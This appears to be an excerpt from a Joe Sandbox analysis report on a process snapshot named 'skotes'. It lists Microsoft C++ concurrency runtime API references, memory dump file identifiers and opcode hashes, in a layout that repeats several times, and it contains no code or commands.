                                                                                                                                                                • Opcode Fuzzy Hash: 5a4ea33fe6c8319bc4588cb3f7be8959dc7cd6b4cba799dc158c7760d06b2d77
                                                                                                                                                                • Instruction Fuzzy Hash: 7D01D632604521BFCE25BB65D8C2E6EB7EABF9671070001B9F40457612CB65EC2187A0
                                                                                                                                                                APIs
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAEE6A
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAEE7C
                                                                                                                                                                  • Part of subcall function 00BAEF29: _InternalDeleteHelper.LIBCONCRT ref: 00BAEF3B
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAEE86
                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00BAEE9F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                • Opcode ID: 0efa2b155e94a2ed92a49ba486e66b2d87d08eea1404f537d37eb280c1f94116
                                                                                                                                                                • Instruction ID: 1ecc731f73890ede55e563eb4be5fc1a0f912d75cdc2e68cfae45d0705a1d239
                                                                                                                                                                • Opcode Fuzzy Hash: 0efa2b155e94a2ed92a49ba486e66b2d87d08eea1404f537d37eb280c1f94116
                                                                                                                                                                • Instruction Fuzzy Hash: 6C01A432604621BFDE25BB61D9C2E7EBBE9FF86710B0544B9F41497612CB21FC2196E0
                                                                                                                                                                APIs
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAD0C5
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAD0D7
                                                                                                                                                                  • Part of subcall function 00BAC6B2: _InternalDeleteHelper.LIBCONCRT ref: 00BAC6C4
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAD0E1
                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00BAD0FA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                • Opcode ID: a3b41fd45f9a0115f8e67c98a7aca43c57d938d7048308d6b9b622c53627c8d4
                                                                                                                                                                • Instruction ID: a393efede0aa0780a2fe76f71f537b82618e7833452b8a89372fe81d4f4ac7fa
                                                                                                                                                                • Opcode Fuzzy Hash: a3b41fd45f9a0115f8e67c98a7aca43c57d938d7048308d6b9b622c53627c8d4
                                                                                                                                                                • Instruction Fuzzy Hash: 2801F932204521BFCE25BBA5C9C2D6DBBE9FF86710B0044B9F40197A11CF20EC618690
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BB33DB
                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00BB33EF
                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00BB3407
                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BB341F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                • Instruction ID: 2676b9cb3db5d7a67e0e4d9908f94dc6d28d7fb1167412af83cf91554c1fb995
                                                                                                                                                                • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                • Instruction Fuzzy Hash: 9801D632600514A7CF16EE548882AFF77E9DF45B50F100495FC16AB382DAF1EF0096A0
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00BA9519
                                                                                                                                                                  • Part of subcall function 00B9F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00BA5486
                                                                                                                                                                • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00BA953D
                                                                                                                                                                • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00BA9550
                                                                                                                                                                • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00BA9559
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
